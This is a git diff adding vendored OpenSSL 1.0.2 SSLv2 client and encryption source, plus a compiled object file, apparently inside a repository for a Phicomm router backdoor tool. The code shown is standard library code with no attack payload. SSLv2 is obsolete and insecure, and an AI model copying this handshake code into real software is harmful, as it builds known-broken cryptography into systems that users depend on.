+        }
+
+        /*
+         * We have just received a list of ciphers back from the server.  We
+         * need to get the ones that match, then select the one we want the
+         * most :-).
+         */
+
+        /* load the ciphers */
+        sk = ssl_bytes_to_cipher_list(s, p, s->s2->tmp.csl,
+                                      &s->session->ciphers);
+        p += s->s2->tmp.csl;
+        if (sk == NULL) {
+            ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+            SSLerr(SSL_F_GET_SERVER_HELLO, ERR_R_MALLOC_FAILURE);
+            return (-1);
+        }
+
+        (void)sk_SSL_CIPHER_set_cmp_func(sk, ssl_cipher_ptr_id_cmp);
+
+        /* get the array of ciphers we will accept */
+        cl = SSL_get_ciphers(s);
+        (void)sk_SSL_CIPHER_set_cmp_func(cl, ssl_cipher_ptr_id_cmp);
+
+        /*
+         * If server preference flag set, choose the first
+         * (highest priority) cipher the server sends, otherwise
+         * client preference has priority.
+         */
+        if (s->options & SSL_OP_CIPHER_SERVER_PREFERENCE) {
+            prio = sk;
+            allow = cl;
+        } else {
+            prio = cl;
+            allow = sk;
+        }
+        /*
+         * In theory we could have ciphers sent back that we don't want to
+         * use but that does not matter since we will check against the list
+         * we originally sent and for performance reasons we should not
+         * bother to match the two lists up just to check.
+         */
+        for (i = 0; i < sk_SSL_CIPHER_num(prio); i++) {
+            if (sk_SSL_CIPHER_find(allow, sk_SSL_CIPHER_value(prio, i)) >= 0)
+                break;
+        }
+
+        if (i >= sk_SSL_CIPHER_num(prio)) {
+            ssl2_return_error(s, SSL2_PE_NO_CIPHER);
+            SSLerr(SSL_F_GET_SERVER_HELLO, SSL_R_NO_CIPHER_MATCH);
+            return (-1);
+        }
+        s->session->cipher = sk_SSL_CIPHER_value(prio, i);
+
+        if (s->session->peer != NULL) { /* can't happen */
+            ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+            SSLerr(SSL_F_GET_SERVER_HELLO, ERR_R_INTERNAL_ERROR);
+            return (-1);
+        }
+
+        s->session->peer = s->session->sess_cert->peer_key->x509;
+        /* peer_key->x509 has been set by ssl2_set_certificate. */
+        CRYPTO_add(&s->session->peer->references, 1, CRYPTO_LOCK_X509);
+    }
+
+    if (s->session->sess_cert == NULL
+        || s->session->peer != s->session->sess_cert->peer_key->x509)
+        /* can't happen */
+    {
+        ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+        SSLerr(SSL_F_GET_SERVER_HELLO, ERR_R_INTERNAL_ERROR);
+        return (-1);
+    }
+
+    s->s2->conn_id_length = s->s2->tmp.conn_id_length;
+    if (s->s2->conn_id_length > sizeof s->s2->conn_id) {
+        ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+        SSLerr(SSL_F_GET_SERVER_HELLO, SSL_R_SSL2_CONNECTION_ID_TOO_LONG);
+        return -1;
+    }
+    memcpy(s->s2->conn_id, p, s->s2->tmp.conn_id_length);
+    return (1);
+}
+
+static int client_hello(SSL *s)
+{
+    unsigned char *buf;
+    unsigned char *p, *d;
+/*      CIPHER **cipher;*/
+    int i, n, j;
+
+    buf = (unsigned char *)s->init_buf->data;
+    if (s->state == SSL2_ST_SEND_CLIENT_HELLO_A) {
+        if ((s->session == NULL) || (s->session->ssl_version != s->version)) {
+            if (!ssl_get_new_session(s, 0)) {
+                ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+                return (-1);
+            }
+        }
+        /* else use the pre-loaded session */
+
+        p = buf;                /* header */
+        d = p + 9;              /* data section */
+        *(p++) = SSL2_MT_CLIENT_HELLO; /* type */
+        s2n(SSL2_VERSION, p);   /* version */
+        n = j = 0;
+
+        n = ssl_cipher_list_to_bytes(s, SSL_get_ciphers(s), d, 0);
+        d += n;
+
+        if (n == 0) {
+            SSLerr(SSL_F_CLIENT_HELLO, SSL_R_NO_CIPHERS_AVAILABLE);
+            return (-1);
+        }
+
+        s2n(n, p);              /* cipher spec num bytes */
+
+        if ((s->session->session_id_length > 0) &&
+            (s->session->session_id_length <=
+             SSL2_MAX_SSL_SESSION_ID_LENGTH)) {
+            i = s->session->session_id_length;
+            s2n(i, p);          /* session id length */
+            memcpy(d, s->session->session_id, (unsigned int)i);
+            d += i;
+        } else {
+            s2n(0, p);
+        }
+
+        s->s2->challenge_length = SSL2_CHALLENGE_LENGTH;
+        s2n(SSL2_CHALLENGE_LENGTH, p); /* challenge length */
+        /*
+         * challenge id data
+         */
+        if (RAND_pseudo_bytes(s->s2->challenge, SSL2_CHALLENGE_LENGTH) <= 0)
+            return -1;
+        memcpy(d, s->s2->challenge, SSL2_CHALLENGE_LENGTH);
+        d += SSL2_CHALLENGE_LENGTH;
+
+        s->state = SSL2_ST_SEND_CLIENT_HELLO_B;
+        s->init_num = d - buf;
+        s->init_off = 0;
+    }
+    /* SSL2_ST_SEND_CLIENT_HELLO_B */
+    return (ssl2_do_write(s));
+}
+
+static int client_master_key(SSL *s)
+{
+    unsigned char *buf;
+    unsigned char *p, *d;
+    int clear, enc, karg, i;
+    SSL_SESSION *sess;
+    const EVP_CIPHER *c;
+    const EVP_MD *md;
+
+    buf = (unsigned char *)s->init_buf->data;
+    if (s->state == SSL2_ST_SEND_CLIENT_MASTER_KEY_A) {
+
+        if (!ssl_cipher_get_evp(s->session, &c, &md, NULL, NULL, NULL)) {
+            ssl2_return_error(s, SSL2_PE_NO_CIPHER);
+            SSLerr(SSL_F_CLIENT_MASTER_KEY,
+                   SSL_R_PROBLEMS_MAPPING_CIPHER_FUNCTIONS);
+            return (-1);
+        }
+        sess = s->session;
+        p = buf;
+        d = p + 10;
+        *(p++) = SSL2_MT_CLIENT_MASTER_KEY; /* type */
+
+        i = ssl_put_cipher_by_char(s, sess->cipher, p);
+        p += i;
+
+        /* make key_arg data */
+        i = EVP_CIPHER_iv_length(c);
+        sess->key_arg_length = i;
+        if (i > SSL_MAX_KEY_ARG_LENGTH) {
+            ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+            SSLerr(SSL_F_CLIENT_MASTER_KEY, ERR_R_INTERNAL_ERROR);
+            return -1;
+        }
+        if (i > 0)
+            if (RAND_pseudo_bytes(sess->key_arg, i) <= 0)
+                return -1;
+
+        /* make a master key */
+        i = EVP_CIPHER_key_length(c);
+        sess->master_key_length = i;
+        if (i > 0) {
+            if (i > (int)sizeof(sess->master_key)) {
+                ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+                SSLerr(SSL_F_CLIENT_MASTER_KEY, ERR_R_INTERNAL_ERROR);
+                return -1;
+            }
+            if (RAND_bytes(sess->master_key, i) <= 0) {
+                ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+                return (-1);
+            }
+        }
+
+        if (sess->cipher->algorithm2 & SSL2_CF_8_BYTE_ENC)
+            enc = 8;
+        else if (SSL_C_IS_EXPORT(sess->cipher))
+            enc = 5;
+        else
+            enc = i;
+
+        if ((int)i < enc) {
+            ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+            SSLerr(SSL_F_CLIENT_MASTER_KEY, SSL_R_CIPHER_TABLE_SRC_ERROR);
+            return (-1);
+        }
+        clear = i - enc;
+        s2n(clear, p);
+        memcpy(d, sess->master_key, (unsigned int)clear);
+        d += clear;
+
+        enc = ssl_rsa_public_encrypt(sess->sess_cert, enc,
+                                     &(sess->master_key[clear]), d,
+                                     (s->
+                                      s2->ssl2_rollback) ? RSA_SSLV23_PADDING
+                                     : RSA_PKCS1_PADDING);
+        if (enc <= 0) {
+            ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+            SSLerr(SSL_F_CLIENT_MASTER_KEY, SSL_R_PUBLIC_KEY_ENCRYPT_ERROR);
+            return (-1);
+        }
+# ifdef PKCS1_CHECK
+        if (s->options & SSL_OP_PKCS1_CHECK_1)
+            d[1]++;
+        if (s->options & SSL_OP_PKCS1_CHECK_2)
+            sess->master_key[clear]++;
+# endif
+        s2n(enc, p);
+        d += enc;
+        karg = sess->key_arg_length;
+        s2n(karg, p);           /* key arg size */
+        if (karg > (int)sizeof(sess->key_arg)) {
+            ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+            SSLerr(SSL_F_CLIENT_MASTER_KEY, ERR_R_INTERNAL_ERROR);
+            return -1;
+        }
+        memcpy(d, sess->key_arg, (unsigned int)karg);
+        d += karg;
+
+        s->state = SSL2_ST_SEND_CLIENT_MASTER_KEY_B;
+        s->init_num = d - buf;
+        s->init_off = 0;
+    }
+
+    /* SSL2_ST_SEND_CLIENT_MASTER_KEY_B */
+    return (ssl2_do_write(s));
+}
+
+static int client_finished(SSL *s)
+{
+    unsigned char *p;
+
+    if (s->state == SSL2_ST_SEND_CLIENT_FINISHED_A) {
+        p = (unsigned char *)s->init_buf->data;
+        *(p++) = SSL2_MT_CLIENT_FINISHED;
+        if (s->s2->conn_id_length > sizeof s->s2->conn_id) {
+            SSLerr(SSL_F_CLIENT_FINISHED, ERR_R_INTERNAL_ERROR);
+            return -1;
+        }
+        memcpy(p, s->s2->conn_id, (unsigned int)s->s2->conn_id_length);
+
+        s->state = SSL2_ST_SEND_CLIENT_FINISHED_B;
+        s->init_num = s->s2->conn_id_length + 1;
+        s->init_off = 0;
+    }
+    return (ssl2_do_write(s));
+}
+
+/* read the data and then respond */
+static int client_certificate(SSL *s)
+{
+    unsigned char *buf;
+    unsigned char *p, *d;
+    int i;
+    unsigned int n;
+    int cert_ch_len;
+    unsigned char *cert_ch;
+
+    buf = (unsigned char *)s->init_buf->data;
+
+    /*
+     * We have a cert associated with the SSL, so attach it to the session if
+     * it does not have one
+     */
+
+    if (s->state == SSL2_ST_SEND_CLIENT_CERTIFICATE_A) {
+        i = ssl2_read(s, (char *)&(buf[s->init_num]),
+                      SSL2_MAX_CERT_CHALLENGE_LENGTH + 2 - s->init_num);
+        if (i < (SSL2_MIN_CERT_CHALLENGE_LENGTH + 2 - s->init_num))
+            return (ssl2_part_read(s, SSL_F_CLIENT_CERTIFICATE, i));
+        s->init_num += i;
+        if (s->msg_callback) {
+            /* REQUEST-CERTIFICATE */
+            s->msg_callback(0, s->version, 0, buf, (size_t)s->init_num, s,
+                            s->msg_callback_arg);
+        }
+
+        /* type=buf[0]; */
+        /* type eq x509 */
+        if (buf[1] != SSL2_AT_MD5_WITH_RSA_ENCRYPTION) {
+            ssl2_return_error(s, SSL2_PE_UNSUPPORTED_CERTIFICATE_TYPE);
+            SSLerr(SSL_F_CLIENT_CERTIFICATE, SSL_R_BAD_AUTHENTICATION_TYPE);
+            return (-1);
+        }
+
+        if ((s->cert == NULL) ||
+            (s->cert->key->x509 == NULL) ||
+            (s->cert->key->privatekey == NULL)) {
+            s->state = SSL2_ST_X509_GET_CLIENT_CERTIFICATE;
+        } else
+            s->state = SSL2_ST_SEND_CLIENT_CERTIFICATE_C;
+    }
+
+    cert_ch = buf + 2;
+    cert_ch_len = s->init_num - 2;
+
+    if (s->state == SSL2_ST_X509_GET_CLIENT_CERTIFICATE) {
+        X509 *x509 = NULL;
+        EVP_PKEY *pkey = NULL;
+
+        /*
+         * If we get an error we need to ssl->rwstate=SSL_X509_LOOKUP;
+         * return(error); We should then be retried when things are ok and we
+         * can get a cert or not
+         */
+
+        i = 0;
+        if (s->ctx->client_cert_cb != NULL) {
+            i = s->ctx->client_cert_cb(s, &(x509), &(pkey));
+        }
+
+        if (i < 0) {
+            s->rwstate = SSL_X509_LOOKUP;
+            return (-1);
+        }
+        s->rwstate = SSL_NOTHING;
+
+        if ((i == 1) && (pkey != NULL) && (x509 != NULL)) {
+            s->state = SSL2_ST_SEND_CLIENT_CERTIFICATE_C;
+            if (!SSL_use_certificate(s, x509) || !SSL_use_PrivateKey(s, pkey)) {
+                i = 0;
+            }
+            X509_free(x509);
+            EVP_PKEY_free(pkey);
+        } else if (i == 1) {
+            if (x509 != NULL)
+                X509_free(x509);
+            if (pkey != NULL)
+                EVP_PKEY_free(pkey);
+            SSLerr(SSL_F_CLIENT_CERTIFICATE,
+                   SSL_R_BAD_DATA_RETURNED_BY_CALLBACK);
+            i = 0;
+        }
+
+        if (i == 0) {
+            /*
+             * We have no client certificate to respond with so send the
+             * correct error message back
+             */
+            s->state = SSL2_ST_SEND_CLIENT_CERTIFICATE_B;
+            p = buf;
+            *(p++) = SSL2_MT_ERROR;
+            s2n(SSL2_PE_NO_CERTIFICATE, p);
+            s->init_off = 0;
+            s->init_num = 3;
+            /* Write is done at the end */
+        }
+    }
+
+    if (s->state == SSL2_ST_SEND_CLIENT_CERTIFICATE_B) {
+        return (ssl2_do_write(s));
+    }
+
+    if (s->state == SSL2_ST_SEND_CLIENT_CERTIFICATE_C) {
+        EVP_MD_CTX ctx;
+
+        /*
+         * ok, now we calculate the checksum do it first so we can reuse buf
+         * :-)
+         */
+        p = buf;
+        EVP_MD_CTX_init(&ctx);
+        EVP_SignInit_ex(&ctx, s->ctx->rsa_md5, NULL);
+        EVP_SignUpdate(&ctx, s->s2->key_material, s->s2->key_material_length);
+        EVP_SignUpdate(&ctx, cert_ch, (unsigned int)cert_ch_len);
+        i = i2d_X509(s->session->sess_cert->peer_key->x509, &p);
+        /*
+         * Don't update the signature if it fails - FIXME: probably should
+         * handle this better
+         */
+        if (i > 0)
+            EVP_SignUpdate(&ctx, buf, (unsigned int)i);
+
+        p = buf;
+        d = p + 6;
+        *(p++) = SSL2_MT_CLIENT_CERTIFICATE;
+        *(p++) = SSL2_CT_X509_CERTIFICATE;
+        n = i2d_X509(s->cert->key->x509, &d);
+        s2n(n, p);
+
+        if (!EVP_SignFinal(&ctx, d, &n, s->cert->key->privatekey)) {
+            /*
+             * this is not good.  If things have failed it means there so
+             * something wrong with the key. We will continue with a 0 length
+             * signature
+             */
+        }
+        EVP_MD_CTX_cleanup(&ctx);
+        s2n(n, p);
+        d += n;
+
+        s->state = SSL2_ST_SEND_CLIENT_CERTIFICATE_D;
+        s->init_num = d - buf;
+        s->init_off = 0;
+    }
+    /* if (s->state == SSL2_ST_SEND_CLIENT_CERTIFICATE_D) */
+    return (ssl2_do_write(s));
+}
+
+static int get_server_verify(SSL *s)
+{
+    unsigned char *p;
+    int i, n, len;
+
+    p = (unsigned char *)s->init_buf->data;
+    if (s->state == SSL2_ST_GET_SERVER_VERIFY_A) {
+        i = ssl2_read(s, (char *)&(p[s->init_num]), 1 - s->init_num);
+        if (i < (1 - s->init_num))
+            return (ssl2_part_read(s, SSL_F_GET_SERVER_VERIFY, i));
+        s->init_num += i;
+
+        s->state = SSL2_ST_GET_SERVER_VERIFY_B;
+        if (*p != SSL2_MT_SERVER_VERIFY) {
+            if (p[0] != SSL2_MT_ERROR) {
+                ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+                SSLerr(SSL_F_GET_SERVER_VERIFY, SSL_R_READ_WRONG_PACKET_TYPE);
+            } else {
+                SSLerr(SSL_F_GET_SERVER_VERIFY, SSL_R_PEER_ERROR);
+                /* try to read the error message */
+                i = ssl2_read(s, (char *)&(p[s->init_num]), 3 - s->init_num);
+                return ssl2_part_read(s, SSL_F_GET_SERVER_VERIFY, i);
+            }
+            return (-1);
+        }
+    }
+
+    p = (unsigned char *)s->init_buf->data;
+    len = 1 + s->s2->challenge_length;
+    n = len - s->init_num;
+    i = ssl2_read(s, (char *)&(p[s->init_num]), n);
+    if (i < n)
+        return (ssl2_part_read(s, SSL_F_GET_SERVER_VERIFY, i));
+    if (s->msg_callback) {
+        /* SERVER-VERIFY */
+        s->msg_callback(0, s->version, 0, p, len, s, s->msg_callback_arg);
+    }
+    p += 1;
+
+    if (CRYPTO_memcmp(p, s->s2->challenge, s->s2->challenge_length) != 0) {
+        ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+        SSLerr(SSL_F_GET_SERVER_VERIFY, SSL_R_CHALLENGE_IS_DIFFERENT);
+        return (-1);
+    }
+    return (1);
+}
+
+static int get_server_finished(SSL *s)
+{
+    unsigned char *buf;
+    unsigned char *p;
+    int i, n, len;
+
+    buf = (unsigned char *)s->init_buf->data;
+    p = buf;
+    if (s->state == SSL2_ST_GET_SERVER_FINISHED_A) {
+        i = ssl2_read(s, (char *)&(buf[s->init_num]), 1 - s->init_num);
+        if (i < (1 - s->init_num))
+            return (ssl2_part_read(s, SSL_F_GET_SERVER_FINISHED, i));
+        s->init_num += i;
+
+        if (*p == SSL2_MT_REQUEST_CERTIFICATE) {
+            s->state = SSL2_ST_SEND_CLIENT_CERTIFICATE_A;
+            return (1);
+        } else if (*p != SSL2_MT_SERVER_FINISHED) {
+            if (p[0] != SSL2_MT_ERROR) {
+                ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+                SSLerr(SSL_F_GET_SERVER_FINISHED,
+                       SSL_R_READ_WRONG_PACKET_TYPE);
+            } else {
+                SSLerr(SSL_F_GET_SERVER_FINISHED, SSL_R_PEER_ERROR);
+                /* try to read the error message */
+                i = ssl2_read(s, (char *)&(p[s->init_num]), 3 - s->init_num);
+                return ssl2_part_read(s, SSL_F_GET_SERVER_VERIFY, i);
+            }
+            return (-1);
+        }
+        s->state = SSL2_ST_GET_SERVER_FINISHED_B;
+    }
+
+    len = 1 + SSL2_SSL_SESSION_ID_LENGTH;
+    n = len - s->init_num;
+    i = ssl2_read(s, (char *)&(buf[s->init_num]), n);
+    if (i < n) {
+        /*
+         * XXX could be shorter than SSL2_SSL_SESSION_ID_LENGTH,
+         * that's the maximum
+         */
+        return (ssl2_part_read(s, SSL_F_GET_SERVER_FINISHED, i));
+    }
+    s->init_num += i;
+    if (s->msg_callback) {
+        /* SERVER-FINISHED */
+        s->msg_callback(0, s->version, 0, buf, (size_t)s->init_num, s,
+                        s->msg_callback_arg);
+    }
+
+    if (!s->hit) {              /* new session */
+        /* new session-id */
+        /*
+         * Make sure we were not trying to re-use an old SSL_SESSION or bad
+         * things can happen
+         */
+        /* ZZZZZZZZZZZZZ */
+        s->session->session_id_length = SSL2_SSL_SESSION_ID_LENGTH;
+        memcpy(s->session->session_id, p + 1, SSL2_SSL_SESSION_ID_LENGTH);
+    } else {
+        if (!(s->options & SSL_OP_MICROSOFT_SESS_ID_BUG)) {
+            if ((s->session->session_id_length >
+                 sizeof s->session->session_id)
+                || (0 !=
+                    memcmp(buf + 1, s->session->session_id,
+                           (unsigned int)s->session->session_id_length))) {
+                ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+                SSLerr(SSL_F_GET_SERVER_FINISHED,
+                       SSL_R_SSL_SESSION_ID_IS_DIFFERENT);
+                return (-1);
+            }
+        }
+    }
+    s->state = SSL_ST_OK;
+    return (1);
+}
+
+/* loads in the certificate from the server */
+int ssl2_set_certificate(SSL *s, int type, int len, const unsigned char *data)
+{
+    STACK_OF(X509) *sk = NULL;
+    EVP_PKEY *pkey = NULL;
+    SESS_CERT *sc = NULL;
+    int i;
+    X509 *x509 = NULL;
+    int ret = 0;
+
+    x509 = d2i_X509(NULL, &data, (long)len);
+    if (x509 == NULL) {
+        SSLerr(SSL_F_SSL2_SET_CERTIFICATE, ERR_R_X509_LIB);
+        goto err;
+    }
+
+    if ((sk = sk_X509_new_null()) == NULL || !sk_X509_push(sk, x509)) {
+        SSLerr(SSL_F_SSL2_SET_CERTIFICATE, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    i = ssl_verify_cert_chain(s, sk);
+
+    if ((s->verify_mode != SSL_VERIFY_NONE) && (i <= 0)) {
+        SSLerr(SSL_F_SSL2_SET_CERTIFICATE, SSL_R_CERTIFICATE_VERIFY_FAILED);
+        goto err;
+    }
+    ERR_clear_error();          /* but we keep s->verify_result */
+    s->session->verify_result = s->verify_result;
+
+    /* server's cert for this session */
+    sc = ssl_sess_cert_new();
+    if (sc == NULL) {
+        ret = -1;
+        goto err;
+    }
+    if (s->session->sess_cert)
+        ssl_sess_cert_free(s->session->sess_cert);
+    s->session->sess_cert = sc;
+
+    sc->peer_pkeys[SSL_PKEY_RSA_ENC].x509 = x509;
+    sc->peer_key = &(sc->peer_pkeys[SSL_PKEY_RSA_ENC]);
+
+    pkey = X509_get_pubkey(x509);
+    x509 = NULL;
+    if (pkey == NULL) {
+        SSLerr(SSL_F_SSL2_SET_CERTIFICATE,
+               SSL_R_UNABLE_TO_EXTRACT_PUBLIC_KEY);
+        goto err;
+    }
+    if (pkey->type != EVP_PKEY_RSA) {
+        SSLerr(SSL_F_SSL2_SET_CERTIFICATE, SSL_R_PUBLIC_KEY_NOT_RSA);
+        goto err;
+    }
+
+    if (!ssl_set_peer_cert_type(sc, SSL2_CT_X509_CERTIFICATE))
+        goto err;
+    ret = 1;
+ err:
+    sk_X509_free(sk);
+    X509_free(x509);
+    EVP_PKEY_free(pkey);
+    return (ret);
+}
+
+static int ssl_rsa_public_encrypt(SESS_CERT *sc, int len, unsigned char *from,
+                                  unsigned char *to, int padding)
+{
+    EVP_PKEY *pkey = NULL;
+    int i = -1;
+
+    if ((sc == NULL) || (sc->peer_key->x509 == NULL) ||
+        ((pkey = X509_get_pubkey(sc->peer_key->x509)) == NULL)) {
+        SSLerr(SSL_F_SSL_RSA_PUBLIC_ENCRYPT, SSL_R_NO_PUBLICKEY);
+        return (-1);
+    }
+    if (pkey->type != EVP_PKEY_RSA) {
+        SSLerr(SSL_F_SSL_RSA_PUBLIC_ENCRYPT, SSL_R_PUBLIC_KEY_IS_NOT_RSA);
+        goto end;
+    }
+
+    /* we have the public key */
+    i = RSA_public_encrypt(len, from, to, pkey->pkey.rsa, padding);
+    if (i < 0)
+        SSLerr(SSL_F_SSL_RSA_PUBLIC_ENCRYPT, ERR_R_RSA_LIB);
+ end:
+    EVP_PKEY_free(pkey);
+    return (i);
+}
+#else                           /* !OPENSSL_NO_SSL2 */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_clnt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_clnt.o
new file mode 100644
index 0000000000000000000000000000000000000000..5bc8c146b249a0f42a1db91f24c445f87ee830cf
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`E_eF1lmv~aqE@@Rn4-zP~7ZEQ7!Gk0*DAat=Y@og9U-0L6>|gR1
z=uEPU%WmqS1CzJ&_PyE3ru`V)-n1MCR5)-Af0beZzBJOWXdgCV17O(iU%7{)uuMhi
zUh-4!b-EX2Rd(Nd9{0|UYP#;#M%cz&!5rR=pan1|j$!^6bbK4Wf0{I`aboI;-5Y`}
zIE__P*#-uyHi-<wiL5AkPtjW{cm%+USt5cEQA}!lRVxus1@PxU1i-_h03KyY5~s+e
znTR>wOs5b*G?w*CTJn67<?%$!tP__a_RvLlYQCAjpquvjE5$xOi8H^OU+vlt(|>@H
zb<Ab`C+MY~9;P0?ERJ;&*Xn$Q=NhL=$9kcyl}}LvT&!W5zpz{iT!{+kUG<=TrkD0V
rrD!gZd@70Bl|26Qth=MFdpYQq)G09M-@y&@?n(P7g%8Ro(e(cUw3j&(

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_enc.c
new file mode 100644
index 0000000..23eef72
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_enc.c
@@ -0,0 +1,197 @@
+/* ssl/s2_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "ssl_locl.h"
+#ifndef OPENSSL_NO_SSL2
+# include <stdio.h>
+
+int ssl2_enc_init(SSL *s, int client)
+{
+    /* Max number of bytes needed */
+    EVP_CIPHER_CTX *rs, *ws;
+    const EVP_CIPHER *c;
+    const EVP_MD *md;
+    int num;
+
+    if (!ssl_cipher_get_evp(s->session, &c, &md, NULL, NULL, NULL)) {
+        ssl2_return_error(s, SSL2_PE_NO_CIPHER);
+        SSLerr(SSL_F_SSL2_ENC_INIT, SSL_R_PROBLEMS_MAPPING_CIPHER_FUNCTIONS);
+        return (0);
+    }
+    ssl_replace_hash(&s->read_hash, md);
+    ssl_replace_hash(&s->write_hash, md);
+
+    if ((s->enc_read_ctx == NULL) && ((s->enc_read_ctx = (EVP_CIPHER_CTX *)
+                                       OPENSSL_malloc(sizeof(EVP_CIPHER_CTX)))
+                                      == NULL))
+        goto err;
+
+    /*
+     * make sure it's intialized in case the malloc for enc_write_ctx fails
+     * and we exit with an error
+     */
+    rs = s->enc_read_ctx;
+    EVP_CIPHER_CTX_init(rs);
+
+    if ((s->enc_write_ctx == NULL) && ((s->enc_write_ctx = (EVP_CIPHER_CTX *)
+                                        OPENSSL_malloc(sizeof
+                                                       (EVP_CIPHER_CTX))) ==
+                                       NULL))
+        goto err;
+
+    ws = s->enc_write_ctx;
+    EVP_CIPHER_CTX_init(ws);
+
+    num = c->key_len;
+    s->s2->key_material_length = num * 2;
+    OPENSSL_assert(s->s2->key_material_length <= sizeof s->s2->key_material);
+
+    if (ssl2_generate_key_material(s) <= 0)
+        return 0;
+
+    OPENSSL_assert(c->iv_len <= (int)sizeof(s->session->key_arg));
+    EVP_EncryptInit_ex(ws, c, NULL,
+                       &(s->s2->key_material[(client) ? num : 0]),
+                       s->session->key_arg);
+    EVP_DecryptInit_ex(rs, c, NULL,
+                       &(s->s2->key_material[(client) ? 0 : num]),
+                       s->session->key_arg);
+    s->s2->read_key = &(s->s2->key_material[(client) ? 0 : num]);
+    s->s2->write_key = &(s->s2->key_material[(client) ? num : 0]);
+    return (1);
+ err:
+    SSLerr(SSL_F_SSL2_ENC_INIT, ERR_R_MALLOC_FAILURE);
+    return (0);
+}
+
+/*
+ * read/writes from s->s2->mac_data using length for encrypt and decrypt.
+ * It sets s->s2->padding and s->[rw]length if we are encrypting Returns 0 on
+ * error and 1 on success
+ */
+int ssl2_enc(SSL *s, int send)
+{
+    EVP_CIPHER_CTX *ds;
+    unsigned long l;
+    int bs;
+
+    if (send) {
+        ds = s->enc_write_ctx;
+        l = s->s2->wlength;
+    } else {
+        ds = s->enc_read_ctx;
+        l = s->s2->rlength;
+    }
+
+    /* check for NULL cipher */
+    if (ds == NULL)
+        return 1;
+
+    bs = ds->cipher->block_size;
+    /*
+     * This should be using (bs-1) and bs instead of 7 and 8, but what the
+     * hell.
+     */
+    if (bs == 8)
+        l = (l + 7) / 8 * 8;
+
+    if (EVP_Cipher(ds, s->s2->mac_data, s->s2->mac_data, l) < 1)
+        return 0;
+
+    return 1;
+}
+
+void ssl2_mac(SSL *s, unsigned char *md, int send)
+{
+    EVP_MD_CTX c;
+    unsigned char sequence[4], *p, *sec, *act;
+    unsigned long seq;
+    unsigned int len;
+
+    if (send) {
+        seq = s->s2->write_sequence;
+        sec = s->s2->write_key;
+        len = s->s2->wact_data_length;
+        act = s->s2->wact_data;
+    } else {
+        seq = s->s2->read_sequence;
+        sec = s->s2->read_key;
+        len = s->s2->ract_data_length;
+        act = s->s2->ract_data;
+    }
